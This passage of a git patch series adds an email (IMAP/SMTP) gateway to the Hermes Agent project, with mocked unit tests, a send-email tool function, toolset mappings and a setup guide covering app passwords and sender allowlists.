+        """Without thread context, subject should be 'Re: Hermes Agent'."""
+        adapter = self._make_adapter()
+
+        with patch("smtplib.SMTP") as mock_smtp:
+            mock_server = MagicMock()
+            mock_smtp.return_value = mock_server
+
+            adapter._send_email("newuser@test.com", "Hello!", None)
+
+            send_call = mock_server.send_message.call_args[0][0]
+            self.assertEqual(send_call["Subject"], "Re: Hermes Agent")
+
+
+class TestSendMethods(unittest.TestCase):
+    """Test email send methods."""
+
+    def _make_adapter(self):
+        from gateway.config import PlatformConfig
+        with patch.dict(os.environ, {
+            "EMAIL_ADDRESS": "hermes@test.com",
+            "EMAIL_PASSWORD": "secret",
+            "EMAIL_IMAP_HOST": "imap.test.com",
+            "EMAIL_SMTP_HOST": "smtp.test.com",
+        }):
+            from gateway.platforms.email import EmailAdapter
+            adapter = EmailAdapter(PlatformConfig(enabled=True))
+        return adapter
+
+    def test_send_calls_smtp(self):
+        """send() should use SMTP to deliver email."""
+        import asyncio
+        adapter = self._make_adapter()
+
+        with patch("smtplib.SMTP") as mock_smtp:
+            mock_server = MagicMock()
+            mock_smtp.return_value = mock_server
+
+            result = asyncio.get_event_loop().run_until_complete(
+                adapter.send("user@test.com", "Hello from Hermes!")
+            )
+
+            self.assertTrue(result.success)
+            mock_server.starttls.assert_called_once()
+            mock_server.login.assert_called_once_with("hermes@test.com", "secret")
+            mock_server.send_message.assert_called_once()
+            mock_server.quit.assert_called_once()
+
+    def test_send_failure_returns_error(self):
+        """SMTP failure should return SendResult with error."""
+        import asyncio
+        adapter = self._make_adapter()
+
+        with patch("smtplib.SMTP") as mock_smtp:
+            mock_smtp.side_effect = Exception("Connection refused")
+
+            result = asyncio.get_event_loop().run_until_complete(
+                adapter.send("user@test.com", "Hello")
+            )
+
+            self.assertFalse(result.success)
+            self.assertIn("Connection refused", result.error)
+
+    def test_send_image_includes_url(self):
+        """send_image should include image URL in email body."""
+        import asyncio
+        from unittest.mock import AsyncMock
+        adapter = self._make_adapter()
+
+        adapter.send = AsyncMock(return_value=SendResult(success=True))
+
+        asyncio.get_event_loop().run_until_complete(
+            adapter.send_image("user@test.com", "https://img.com/photo.jpg", "My photo")
+        )
+
+        call_args = adapter.send.call_args
+        body = call_args[0][1]
+        self.assertIn("https://img.com/photo.jpg", body)
+        self.assertIn("My photo", body)
+
+    def test_send_document_with_attachment(self):
+        """send_document should send email with file attachment."""
+        import asyncio
+        import tempfile
+        adapter = self._make_adapter()
+
+        with tempfile.NamedTemporaryFile(suffix=".txt", delete=False) as f:
+            f.write(b"Test document content")
+            tmp_path = f.name
+
+        try:
+            with patch("smtplib.SMTP") as mock_smtp:
+                mock_server = MagicMock()
+                mock_smtp.return_value = mock_server
+
+                result = asyncio.get_event_loop().run_until_complete(
+                    adapter.send_document("user@test.com", tmp_path, "Here is the file")
+                )
+
+                self.assertTrue(result.success)
+                mock_server.send_message.assert_called_once()
+                sent_msg = mock_server.send_message.call_args[0][0]
+                # Should be multipart with attachment
+                parts = list(sent_msg.walk())
+                has_attachment = any(
+                    "attachment" in str(p.get("Content-Disposition", ""))
+                    for p in parts
+                )
+                self.assertTrue(has_attachment)
+        finally:
+            os.unlink(tmp_path)
+
+    def test_send_typing_is_noop(self):
+        """send_typing should do nothing for email."""
+        import asyncio
+        adapter = self._make_adapter()
+        # Should not raise
+        asyncio.get_event_loop().run_until_complete(adapter.send_typing("user@test.com"))
+
+    def test_get_chat_info(self):
+        """get_chat_info should return email address as chat info."""
+        import asyncio
+        adapter = self._make_adapter()
+        adapter._thread_context["user@test.com"] = {"subject": "Test", "message_id": "<m@t>"}
+
+        info = asyncio.get_event_loop().run_until_complete(
+            adapter.get_chat_info("user@test.com")
+        )
+
+        self.assertEqual(info["name"], "user@test.com")
+        self.assertEqual(info["type"], "dm")
+        self.assertEqual(info["subject"], "Test")
+
+
+class TestConnectDisconnect(unittest.TestCase):
+    """Test IMAP/SMTP connection lifecycle."""
+
+    def _make_adapter(self):
+        from gateway.config import PlatformConfig
+        with patch.dict(os.environ, {
+            "EMAIL_ADDRESS": "hermes@test.com",
+            "EMAIL_PASSWORD": "secret",
+            "EMAIL_IMAP_HOST": "imap.test.com",
+            "EMAIL_SMTP_HOST": "smtp.test.com",
+        }):
+            from gateway.platforms.email import EmailAdapter
+            adapter = EmailAdapter(PlatformConfig(enabled=True))
+        return adapter
+
+    def test_connect_success(self):
+        """Successful IMAP + SMTP connection returns True."""
+        import asyncio
+        adapter = self._make_adapter()
+
+        mock_imap = MagicMock()
+        mock_imap.search.return_value = ("OK", [b"1 2 3"])
+
+        with patch("imaplib.IMAP4_SSL", return_value=mock_imap), \
+             patch("smtplib.SMTP") as mock_smtp:
+            mock_server = MagicMock()
+            mock_smtp.return_value = mock_server
+
+            result = asyncio.get_event_loop().run_until_complete(adapter.connect())
+
+            self.assertTrue(result)
+            self.assertTrue(adapter._running)
+            # Should have skipped existing messages
+            self.assertEqual(len(adapter._seen_uids), 3)
+            # Cleanup
+            adapter._running = False
+            if adapter._poll_task:
+                adapter._poll_task.cancel()
+
+    def test_connect_imap_failure(self):
+        """IMAP connection failure returns False."""
+        import asyncio
+        adapter = self._make_adapter()
+
+        with patch("imaplib.IMAP4_SSL", side_effect=Exception("IMAP down")):
+            result = asyncio.get_event_loop().run_until_complete(adapter.connect())
+            self.assertFalse(result)
+            self.assertFalse(adapter._running)
+
+    def test_connect_smtp_failure(self):
+        """SMTP connection failure returns False."""
+        import asyncio
+        adapter = self._make_adapter()
+
+        mock_imap = MagicMock()
+        mock_imap.search.return_value = ("OK", [b""])
+
+        with patch("imaplib.IMAP4_SSL", return_value=mock_imap), \
+             patch("smtplib.SMTP", side_effect=Exception("SMTP down")):
+            result = asyncio.get_event_loop().run_until_complete(adapter.connect())
+            self.assertFalse(result)
+
+    def test_disconnect_cancels_poll(self):
+        """disconnect() should cancel the polling task."""
+        import asyncio
+        adapter = self._make_adapter()
+        adapter._running = True
+        adapter._poll_task = asyncio.ensure_future(asyncio.sleep(100))
+
+        asyncio.get_event_loop().run_until_complete(adapter.disconnect())
+
+        self.assertFalse(adapter._running)
+        self.assertIsNone(adapter._poll_task)
+
+
+class TestFetchNewMessages(unittest.TestCase):
+    """Test IMAP message fetching logic."""
+
+    def _make_adapter(self):
+        from gateway.config import PlatformConfig
+        with patch.dict(os.environ, {
+            "EMAIL_ADDRESS": "hermes@test.com",
+            "EMAIL_PASSWORD": "secret",
+            "EMAIL_IMAP_HOST": "imap.test.com",
+            "EMAIL_SMTP_HOST": "smtp.test.com",
+        }):
+            from gateway.platforms.email import EmailAdapter
+            adapter = EmailAdapter(PlatformConfig(enabled=True))
+        return adapter
+
+    def test_fetch_skips_seen_uids(self):
+        """Already-seen UIDs should not be fetched again."""
+        adapter = self._make_adapter()
+        adapter._seen_uids = {b"1", b"2"}
+
+        raw_email = MIMEText("Hello", "plain", "utf-8")
+        raw_email["From"] = "user@test.com"
+        raw_email["Subject"] = "Test"
+        raw_email["Message-ID"] = "<msg@test.com>"
+
+        mock_imap = MagicMock()
+        mock_imap.search.return_value = ("OK", [b"1 2 3"])
+        mock_imap.fetch.return_value = ("OK", [(b"3", raw_email.as_bytes())])
+
+        with patch("imaplib.IMAP4_SSL", return_value=mock_imap):
+            results = adapter._fetch_new_messages()
+
+        # Only UID 3 should be fetched (1 and 2 already seen)
+        self.assertEqual(len(results), 1)
+        self.assertEqual(results[0]["sender_addr"], "user@test.com")
+        self.assertIn(b"3", adapter._seen_uids)
+
+    def test_fetch_no_unseen_messages(self):
+        """No unseen messages returns empty list."""
+        adapter = self._make_adapter()
+
+        mock_imap = MagicMock()
+        mock_imap.search.return_value = ("OK", [b""])
+
+        with patch("imaplib.IMAP4_SSL", return_value=mock_imap):
+            results = adapter._fetch_new_messages()
+
+        self.assertEqual(results, [])
+
+    def test_fetch_handles_imap_error(self):
+        """IMAP errors should be caught and return empty list."""
+        adapter = self._make_adapter()
+
+        with patch("imaplib.IMAP4_SSL", side_effect=Exception("Network error")):
+            results = adapter._fetch_new_messages()
+
+        self.assertEqual(results, [])
+
+    def test_fetch_extracts_sender_name(self):
+        """Sender name should be extracted from 'Name <addr>' format."""
+        adapter = self._make_adapter()
+
+        raw_email = MIMEText("Hello", "plain", "utf-8")
+        raw_email["From"] = '"John Doe" <john@test.com>'
+        raw_email["Subject"] = "Test"
+        raw_email["Message-ID"] = "<msg@test.com>"
+
+        mock_imap = MagicMock()
+        mock_imap.search.return_value = ("OK", [b"1"])
+        mock_imap.fetch.return_value = ("OK", [(b"1", raw_email.as_bytes())])
+
+        with patch("imaplib.IMAP4_SSL", return_value=mock_imap):
+            results = adapter._fetch_new_messages()
+
+        self.assertEqual(len(results), 1)
+        self.assertEqual(results[0]["sender_addr"], "john@test.com")
+        self.assertEqual(results[0]["sender_name"], "John Doe")
+
+
+class TestPollLoop(unittest.TestCase):
+    """Test the async polling loop."""
+
+    def _make_adapter(self):
+        from gateway.config import PlatformConfig
+        with patch.dict(os.environ, {
+            "EMAIL_ADDRESS": "hermes@test.com",
+            "EMAIL_PASSWORD": "secret",
+            "EMAIL_IMAP_HOST": "imap.test.com",
+            "EMAIL_SMTP_HOST": "smtp.test.com",
+            "EMAIL_POLL_INTERVAL": "1",
+        }):
+            from gateway.platforms.email import EmailAdapter
+            adapter = EmailAdapter(PlatformConfig(enabled=True))
+        return adapter
+
+    def test_check_inbox_dispatches_messages(self):
+        """_check_inbox should fetch and dispatch new messages."""
+        import asyncio
+        adapter = self._make_adapter()
+        dispatched = []
+
+        async def mock_dispatch(msg_data):
+            dispatched.append(msg_data)
+
+        adapter._dispatch_message = mock_dispatch
+
+        raw_email = MIMEText("Test body", "plain", "utf-8")
+        raw_email["From"] = "sender@test.com"
+        raw_email["Subject"] = "Inbox Test"
+        raw_email["Message-ID"] = "<inbox@test.com>"
+
+        mock_imap = MagicMock()
+        mock_imap.search.return_value = ("OK", [b"1"])
+        mock_imap.fetch.return_value = ("OK", [(b"1", raw_email.as_bytes())])
+
+        with patch("imaplib.IMAP4_SSL", return_value=mock_imap):
+            asyncio.get_event_loop().run_until_complete(adapter._check_inbox())
+
+        self.assertEqual(len(dispatched), 1)
+        self.assertEqual(dispatched[0]["subject"], "Inbox Test")
+
+
+class TestSendEmailStandalone(unittest.TestCase):
+    """Test the standalone _send_email function in send_message_tool."""
+
+    @patch.dict(os.environ, {
+        "EMAIL_ADDRESS": "hermes@test.com",
+        "EMAIL_PASSWORD": "secret",
+        "EMAIL_SMTP_HOST": "smtp.test.com",
+        "EMAIL_SMTP_PORT": "587",
+    })
+    def test_send_email_tool_success(self):
+        """_send_email should use SMTP to send."""
+        import asyncio
+        from tools.send_message_tool import _send_email
+
+        with patch("smtplib.SMTP") as mock_smtp:
+            mock_server = MagicMock()
+            mock_smtp.return_value = mock_server
+
+            result = asyncio.get_event_loop().run_until_complete(
+                _send_email({"address": "hermes@test.com", "smtp_host": "smtp.test.com"}, "user@test.com", "Hello")
+            )
+
+            self.assertTrue(result["success"])
+            self.assertEqual(result["platform"], "email")
+
+    @patch.dict(os.environ, {
+        "EMAIL_ADDRESS": "hermes@test.com",
+        "EMAIL_PASSWORD": "secret",
+        "EMAIL_SMTP_HOST": "smtp.test.com",
+    })
+    def test_send_email_tool_failure(self):
+        """SMTP failure should return error dict."""
+        import asyncio
+        from tools.send_message_tool import _send_email
+
+        with patch("smtplib.SMTP", side_effect=Exception("SMTP error")):
+            result = asyncio.get_event_loop().run_until_complete(
+                _send_email({"address": "hermes@test.com", "smtp_host": "smtp.test.com"}, "user@test.com", "Hello")
+            )
+
+            self.assertIn("error", result)
+            self.assertIn("SMTP error", result["error"])
+
+    @patch.dict(os.environ, {}, clear=True)
+    def test_send_email_tool_not_configured(self):
+        """Missing config should return error."""
+        import asyncio
+        from tools.send_message_tool import _send_email
+
+        result = asyncio.get_event_loop().run_until_complete(
+            _send_email({}, "user@test.com", "Hello")
+        )
+
+        self.assertIn("error", result)
+        self.assertIn("not configured", result["error"])
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tools/send_message_tool.py b/tools/send_message_tool.py
index f0b1dd27..56176386 100644
--- a/tools/send_message_tool.py
+++ b/tools/send_message_tool.py
@@ -119,6 +119,7 @@ def _handle_send(args):
         "slack": Platform.SLACK,
         "whatsapp": Platform.WHATSAPP,
         "signal": Platform.SIGNAL,
+        "email": Platform.EMAIL,
     }
     platform = platform_map.get(platform_name)
     if not platform:
@@ -185,6 +186,8 @@ async def _send_to_platform(platform, pconfig, chat_id, message, thread_id=None)
         return await _send_slack(pconfig.token, chat_id, message)
     elif platform == Platform.SIGNAL:
         return await _send_signal(pconfig.extra, chat_id, message)
+    elif platform == Platform.EMAIL:
+        return await _send_email(pconfig.extra, chat_id, message)
     return {"error": f"Direct sending not yet implemented for {platform.value}"}
 
 
@@ -283,6 +286,35 @@ async def _send_signal(extra, chat_id, message):
         return {"error": f"Signal send failed: {e}"}
 
 
+async def _send_email(extra, chat_id, message):
+    """Send via SMTP (one-shot, no persistent connection needed)."""
+    import smtplib
+    from email.mime.text import MIMEText
+
+    address = extra.get("address") or os.getenv("EMAIL_ADDRESS", "")
+    password = os.getenv("EMAIL_PASSWORD", "")
+    smtp_host = extra.get("smtp_host") or os.getenv("EMAIL_SMTP_HOST", "")
+    smtp_port = int(os.getenv("EMAIL_SMTP_PORT", "587"))
+
+    if not all([address, password, smtp_host]):
+        return {"error": "Email not configured (EMAIL_ADDRESS, EMAIL_PASSWORD, EMAIL_SMTP_HOST required)"}
+
+    try:
+        msg = MIMEText(message, "plain", "utf-8")
+        msg["From"] = address
+        msg["To"] = chat_id
+        msg["Subject"] = "Hermes Agent"
+
+        server = smtplib.SMTP(smtp_host, smtp_port)
+        server.starttls()
+        server.login(address, password)
+        server.send_message(msg)
+        server.quit()
+        return {"success": True, "platform": "email", "chat_id": chat_id}
+    except Exception as e:
+        return {"error": f"Email send failed: {e}"}
+
+
 def _check_send_message():
     """Gate send_message on gateway running (always available on messaging platforms)."""
     platform = os.getenv("HERMES_SESSION_PLATFORM", "")
diff --git a/toolsets.py b/toolsets.py
index 87b48c7e..4aa37f87 100644
--- a/toolsets.py
+++ b/toolsets.py
@@ -267,10 +267,16 @@ TOOLSETS = {
         "includes": []
     },
 
+    "hermes-email": {
+        "description": "Email bot toolset - interact with Hermes via email (IMAP/SMTP)",
+        "tools": _HERMES_CORE_TOOLS,
+        "includes": []
+    },
+
     "hermes-gateway": {
         "description": "Gateway toolset - union of all messaging platform tools",
         "tools": [],
-        "includes": ["hermes-telegram", "hermes-discord", "hermes-whatsapp", "hermes-slack", "hermes-signal", "hermes-homeassistant"]
+        "includes": ["hermes-telegram", "hermes-discord", "hermes-whatsapp", "hermes-slack", "hermes-signal", "hermes-homeassistant", "hermes-email"]
     }
 }
 

From 184aa5b2b386346ae92efa1cd64bffeba9e66234 Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Wed, 11 Mar 2026 06:31:56 -0700
Subject: [PATCH 073/105] fix: tighten exc_info assertion in vision test (from
 PR #803)

The weaker assertion (r.exc_info is not None) passes even when
exc_info is (None, None, None). Check r.exc_info[0] is not None
to verify actual exception info is present.

The _aux_async_client mock was already applied on main.

Co-authored-by: OutThisLife <nickolasgustafsson@gmail.com>
---
 tests/tools/test_vision_tools.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/tests/tools/test_vision_tools.py b/tests/tools/test_vision_tools.py
index 58fe7d61..0135284a 100644
--- a/tests/tools/test_vision_tools.py
+++ b/tests/tools/test_vision_tools.py
@@ -289,7 +289,7 @@ class TestErrorLoggingExcInfo:
             assert result_data["success"] is False
 
             error_records = [r for r in caplog.records if r.levelno >= logging.ERROR]
-            assert any(r.exc_info is not None for r in error_records)
+            assert any(r.exc_info and r.exc_info[0] is not None for r in error_records)
 
     @pytest.mark.asyncio
     async def test_cleanup_error_logs_exc_info(self, tmp_path, caplog):

From eac5f8f40f9ddb7b5eb158c84bbc91e376d10382 Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Wed, 11 Mar 2026 06:34:32 -0700
Subject: [PATCH 074/105] fix: wire email platform into toolset mappings + add
 documentation
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Post-merge fixes for the email gateway (PR #797):

1. Add Platform.EMAIL to all 4 platform-to-toolset/config mapping
   dicts in gateway/run.py. Without this, email sessions silently
   fell back to the Telegram toolset because these dicts were added
   after the PR branched off main.

2. Add email (and signal) to hermes_cli/tools_config.py and
   hermes_cli/skills_config.py PLATFORMS dicts so they appear in
   'hermes tools' and 'hermes skills' CLI commands.

3. Add full email setup documentation:
   - website/docs/user-guide/messaging/email.md — setup guide with
     Gmail/Outlook instructions, configuration, troubleshooting,
     security advice, and env var reference
   - Update messaging/index.md — add email to architecture diagram,
     platform toolset table, security examples, and next steps
---
 gateway/run.py                             |   4 +
 hermes_cli/skills_config.py                |   2 +
 hermes_cli/tools_config.py                 |   2 +
 website/docs/user-guide/messaging/email.md | 176 +++++++++++++++++++++
 website/docs/user-guide/messaging/index.md |  23 +--
 5 files changed, 197 insertions(+), 10 deletions(-)
 create mode 100644 website/docs/user-guide/messaging/email.md

diff --git a/gateway/run.py b/gateway/run.py
index d91215a6..96d43672 100644
--- a/gateway/run.py
+++ b/gateway/run.py
@@ -2023,6 +2023,7 @@ class GatewayRunner:
                 Platform.SLACK: "hermes-slack",
                 Platform.SIGNAL: "hermes-signal",
                 Platform.HOMEASSISTANT: "hermes-homeassistant",
+                Platform.EMAIL: "hermes-email",
             }
             platform_toolsets_config = {}
             try:
@@ -2043,6 +2044,7 @@ class GatewayRunner:
                 Platform.SLACK: "slack",
                 Platform.SIGNAL: "signal",
                 Platform.HOMEASSISTANT: "homeassistant",
+                Platform.EMAIL: "email",
             }.get(source.platform, "telegram")
 
             config_toolsets = platform_toolsets_config.get(platform_config_key)
@@ -2835,6 +2837,7 @@ class GatewayRunner:
             Platform.SLACK: "hermes-slack",
             Platform.SIGNAL: "hermes-signal",
             Platform.HOMEASSISTANT: "hermes-homeassistant",
+            Platform.EMAIL: "hermes-email",
         }
         
         # Try to load platform_toolsets from config
@@ -2858,6 +2861,7 @@ class GatewayRunner:
             Platform.SLACK: "slack",
             Platform.SIGNAL: "signal",
             Platform.HOMEASSISTANT: "homeassistant",
+            Platform.EMAIL: "email",
         }.get(source.platform, "telegram")
         
         # Use config override if present (list of toolsets), otherwise hardcoded default
diff --git a/hermes_cli/skills_config.py b/hermes_cli/skills_config.py
index 56abed8e..808b6176 100644
--- a/hermes_cli/skills_config.py
+++ b/hermes_cli/skills_config.py
@@ -22,6 +22,8 @@ PLATFORMS = {
     "discord":  "💬 Discord",
     "slack":    "💼 Slack",
     "whatsapp": "📱 WhatsApp",
+    "signal":   "📡 Signal",
+    "email":    "📧 Email",
 }
 
 # ─── Config Helpers ───────────────────────────────────────────────────────────
diff --git a/hermes_cli/tools_config.py b/hermes_cli/tools_config.py
index 8b060016..cb9b9965 100644
--- a/hermes_cli/tools_config.py
+++ b/hermes_cli/tools_config.py
@@ -108,6 +108,8 @@ PLATFORMS = {
     "discord":  {"label": "💬 Discord",    "default_toolset": "hermes-discord"},
     "slack":    {"label": "💼 Slack",      "default_toolset": "hermes-slack"},
     "whatsapp": {"label": "📱 WhatsApp",   "default_toolset": "hermes-whatsapp"},
+    "signal":   {"label": "📡 Signal",     "default_toolset": "hermes-signal"},
+    "email":    {"label": "📧 Email",      "default_toolset": "hermes-email"},
 }
 
 
diff --git a/website/docs/user-guide/messaging/email.md b/website/docs/user-guide/messaging/email.md
new file mode 100644
index 00000000..f6746290
--- /dev/null
+++ b/website/docs/user-guide/messaging/email.md
@@ -0,0 +1,176 @@
+---
+sidebar_position: 7
+title: "Email"
+description: "Set up Hermes Agent as an email assistant via IMAP/SMTP"
+---
+
+# Email Setup
+
+Hermes can receive and reply to emails using standard IMAP and SMTP protocols. Send an email to the agent's address and it replies in-thread — no special client or bot API needed. Works with Gmail, Outlook, Yahoo, Fastmail, or any provider that supports IMAP/SMTP.
+
+:::info No External Dependencies
+The Email adapter uses Python's built-in `imaplib`, `smtplib`, and `email` modules. No additional packages or external services are required.
+:::
+
+---
+
+## Prerequisites
+
+- **A dedicated email account** for your Hermes agent (don't use your personal email)
+- **IMAP enabled** on the email account
+- **An app password** if using Gmail or another provider with 2FA
+
+### Gmail Setup
+
+1. Enable 2-Factor Authentication on your Google Account
+2. Go to [App Passwords](https://myaccount.google.com/apppasswords)
+3. Create a new App Password (select "Mail" or "Other")
+4. Copy the 16-character password — you'll use this instead of your regular password
+
+### Outlook / Microsoft 365
+
+1. Go to [Security Settings](https://account.microsoft.com/security)
+2. Enable 2FA if not already active
+3. Create an App Password under "Additional security options"
+4. IMAP host: `outlook.office365.com`, SMTP host: `smtp.office365.com`
+
+### Other Providers
+
+Most email providers support IMAP/SMTP. Check your provider's documentation for:
+- IMAP host and port (usually port 993 with SSL)
+- SMTP host and port (usually port 587 with STARTTLS)
+- Whether app passwords are required
+
+---
+
+## Step 1: Configure Hermes
+
+The easiest way:
+
+```bash
+hermes gateway setup
+```
+
+Select **Email** from the platform menu. The wizard prompts for your email address, password, IMAP/SMTP hosts, and allowed senders.
+
+### Manual Configuration
+
+Add to `~/.hermes/.env`:
+
+```bash
+# Required
+EMAIL_ADDRESS=hermes@gmail.com
+EMAIL_PASSWORD=abcd efgh ijkl mnop    # App password (not your regular password)
+EMAIL_IMAP_HOST=imap.gmail.com
+EMAIL_SMTP_HOST=smtp.gmail.com
+
+# Security (recommended)
+EMAIL_ALLOWED_USERS=your@email.com,colleague@work.com
+
+# Optional
+EMAIL_IMAP_PORT=993                    # Default: 993 (IMAP SSL)
+EMAIL_SMTP_PORT=587                    # Default: 587 (SMTP STARTTLS)
+EMAIL_POLL_INTERVAL=15                 # Seconds between inbox checks (default: 15)
+EMAIL_HOME_ADDRESS=your@email.com      # Default delivery target for cron jobs
+```
+
+---
+
+## Step 2: Start the Gateway
+
+```bash
+hermes gateway              # Run in foreground
+hermes gateway install      # Install as a system service
+```
+
+On startup, the adapter:
+1. Tests IMAP and SMTP connections
+2. Marks all existing inbox messages as "seen" (only processes new emails)
+3. Starts polling for new messages
+
+---
+
+## How It Works
+
+### Receiving Messages
+
+The adapter polls the IMAP inbox for UNSEEN messages at a configurable interval (default: 15 seconds). For each new email:
+
+- **Subject line** is included as context (e.g., `[Subject: Deploy to production]`)
+- **Reply emails** (subject starting with `Re:`) skip the subject prefix — the thread context is already established
+- **Attachments** are cached locally:
+  - Images (JPEG, PNG, GIF, WebP) → available to the vision tool
+  - Documents (PDF, ZIP, etc.) → available for file access
+- **HTML-only emails** have tags stripped for plain text extraction
+- **Self-messages** are filtered out to prevent reply loops
+
+### Sending Replies
+
+Replies are sent via SMTP with proper email threading:
+
+- **In-Reply-To** and **References** headers maintain the thread
+- **Subject line** preserved with `Re:` prefix (no double `Re: Re:`)
+- **Message-ID** generated with the agent's domain
+- Responses are sent as plain text (UTF-8)
+
+### File Attachments
+
+The agent can send file attachments in replies. Include `MEDIA:/path/to/file` in the response and the file is attached to the outgoing email.
+
+---
+
+## Access Control
+
+Email access follows the same pattern as all other Hermes platforms:
+
+1. **`EMAIL_ALLOWED_USERS` set** → only emails from those addresses are processed
+2. **No allowlist set** → unknown senders get a pairing code
+3. **`EMAIL_ALLOW_ALL_USERS=true`** → any sender is accepted (use with caution)
+
+:::warning
+**Always configure `EMAIL_ALLOWED_USERS`.** Without it, anyone who knows the agent's email address could send commands. The agent has terminal access by default.
+:::
+
+---
+
+## Troubleshooting
+
+| Problem | Solution |
+|---------|----------|
+| **"IMAP connection failed"** at startup | Verify `EMAIL_IMAP_HOST` and `EMAIL_IMAP_PORT`. Ensure IMAP is enabled on the account. For Gmail, enable it in Settings → Forwarding and POP/IMAP. |
+| **"SMTP connection failed"** at startup | Verify `EMAIL_SMTP_HOST` and `EMAIL_SMTP_PORT`. Check that your password is correct (use App Password for Gmail). |
+| **Messages not received** | Check `EMAIL_ALLOWED_USERS` includes the sender's email. Check spam folder — some providers flag automated replies. |
+| **"Authentication failed"** | For Gmail, you must use an App Password, not your regular password. Ensure 2FA is enabled first. |
+| **Duplicate replies** | Ensure only one gateway instance is running. Check `hermes gateway status`. |
+| **Slow response** | The default poll interval is 15 seconds. Reduce with `EMAIL_POLL_INTERVAL=5` for faster response (but more IMAP connections). |
+| **Replies not threading** | The adapter uses In-Reply-To headers. Some email clients (especially web-based) may not thread correctly with automated messages. |
+
+---
+
+## Security
+
+:::warning
+**Use a dedicated email account.** Don't use your personal email — the agent stores the password in `.env` and has full inbox access via IMAP.
+:::
+
+- Use **App Passwords** instead of your main password (required for Gmail with 2FA)
+- Set `EMAIL_ALLOWED_USERS` to restrict who can interact with the agent
+- The password is stored in `~/.hermes/.env` — protect this file (`chmod 600`)
+- IMAP uses SSL (port 993) and SMTP uses STARTTLS (port 587) by default — connections are encrypted
+
+---
+
+## Environment Variables Reference
+
+| Variable | Required | Default | Description |
+|----------|----------|---------|-------------|
+| `EMAIL_ADDRESS` | Yes | — | Agent's email address |
+| `EMAIL_PASSWORD` | Yes | — | Email password or app password |
+| `EMAIL_IMAP_HOST` | Yes | — | IMAP server host (e.g., `imap.gmail.com`) |
+| `EMAIL_SMTP_HOST` | Yes | — | SMTP server host (e.g., `smtp.gmail.com`) |
+| `EMAIL_IMAP_PORT` | No | `993` | IMAP server port |
+| `EMAIL_SMTP_PORT` | No | `587` | SMTP server port |
+| `EMAIL_POLL_INTERVAL` | No | `15` | Seconds between inbox checks |
+| `EMAIL_ALLOWED_USERS` | No | — | Comma-separated allowed sender addresses |
+| `EMAIL_HOME_ADDRESS` | No | — | Default delivery target for cron jobs |
+| `EMAIL_ALLOW_ALL_USERS` | No | `false` | Allow all senders (not recommended) |
diff --git a/website/docs/user-guide/messaging/index.md b/website/docs/user-guide/messaging/index.md
index 913f2fdc..8ff3a49e 100644
--- a/website/docs/user-guide/messaging/index.md
+++ b/website/docs/user-guide/messaging/index.md
@@ -1,12 +1,12 @@
 ---
 sidebar_position: 1
 title: "Messaging Gateway"
-description: "Chat with Hermes from Telegram, Discord, Slack, WhatsApp, or Signal — architecture and setup overview"
+description: "Chat with Hermes from Telegram, Discord, Slack, WhatsApp, Signal, or Email — architecture and setup overview"
 ---
 
 # Messaging Gateway
 
-Chat with Hermes from Telegram, Discord, Slack, WhatsApp, or Signal. The gateway is a single background process that connects to all your configured platforms, handles sessions, runs cron jobs, and delivers voice messages.
+Chat with Hermes from Telegram, Discord, Slack, WhatsApp, Signal, or Email. The gateway is a single background process that connects to all your configured platforms, handles sessions, runs cron jobs, and delivers voice messages.
 
 ## Architecture
 
@@ -15,12 +15,12 @@ Chat with Hermes from Telegram, Discord, Slack, WhatsApp, or Signal. The gateway
 │                      Hermes Gateway                             │
 ├─────────────────────────────────────────────────────────────────┤
 │                                                                 │
-│  ┌──────────┐ ┌──────────┐ ┌──────────┐ ┌──────────┐ ┌────────┐ │
-│  │ Telegram │ │ Discord  │ │ WhatsApp │ │  Slack   │ │ Signal │ │
-│  │ Adapter  │ │ Adapter  │ │ Adapter  │ │ Adapter  │ │ Adapter│ │
-│  └────┬─────┘ └────┬─────┘ └────┬─────┘ └────┬─────┘ └───┬────┘ │
-│       │             │            │             │           │      │
-│       └─────────────┼────────────┼─────────────┼───────────┘      │
+│  ┌──────────┐ ┌──────────┐ ┌──────────┐ ┌────────┐ ┌────────┐ ┌───────┐│
+│  │ Telegram │ │ Discord  │ │ WhatsApp │ │ Slack  │ │ Signal │ │ Email ││
+│  │ Adapter  │ │ Adapter  │ │ Adapter  │ │Adapter │ │Adapter │ │Adapter││
+│  └────┬─────┘ └────┬─────┘ └────┬─────┘ └───┬────┘ └───┬────┘ └──┬────┘│
+│       │             │            │            │          │         │     │
+│       └─────────────┼────────────┼────────────┼──────────┼─────────┘     │
 │                           │                                     │
 │                  ┌────────▼────────┐                            │
 │                  │  Session Store  │                            │
@@ -114,9 +114,10 @@ Configure per-platform overrides in `~/.hermes/gateway.json`:
 # Restrict to specific users (recommended):
 TELEGRAM_ALLOWED_USERS=123456789,987654321
 DISCORD_ALLOWED_USERS=123456789012345678
-SIGNAL_ALLOWED_USERS=+15551234567,+15559876543
+SIGNAL_ALLOWED_USERS=+155****4567,+155****6543
+EMAIL_ALLOWED_USERS=trusted@example.com,colleague@work.com
 
-# Or allow specific users across all platforms (comma-separated user IDs):
+# Or allow
 GATEWAY_ALLOWED_USERS=123456789,987654321
 
 # Or explicitly allow all users (NOT recommended for bots with terminal access):
@@ -202,6 +203,7 @@ Each platform has its own toolset:
 | WhatsApp | `hermes-whatsapp` | Full tools including terminal |
 | Slack | `hermes-slack` | Full tools including terminal |
 | Signal | `hermes-signal` | Full tools including terminal |
+| Email | `hermes-email` | Full tools including terminal |
 
 ## Next Steps
 
@@ -210,3 +212,4 @@ Each platform has its own toolset:
 - [Slack Setup](slack.md)
 - [WhatsApp Setup](whatsapp.md)
 - [Signal Setup](signal.md)
+- [Email Setup](email.md)

From 2c97bf393656047da7cbcb93873df0d5b1f413dc Mon Sep 17 00:00:00 2001
From: dmahan93 <dmayhem93@gmail.com>
Date: Mon, 9 Mar 2026 15:42:16 -0500
Subject: [PATCH 075/105] Add tests for atropos tool calling integration

- test_tool_call_parsers.py: 16 tests for parser registry, hermes parser
  (single/multiple/truncated/malformed), and ParseResult contract validation
- test_agent_loop.py: 21 tests for HermesAgentLoop with mock servers
  (text responses, tool calls, max turns, unknown tools, API errors,
  extra_body forwarding, managed state, blocked tools, reasoning extraction)
- test_managed_server_tool_support.py: 9 tests validating API compatibility
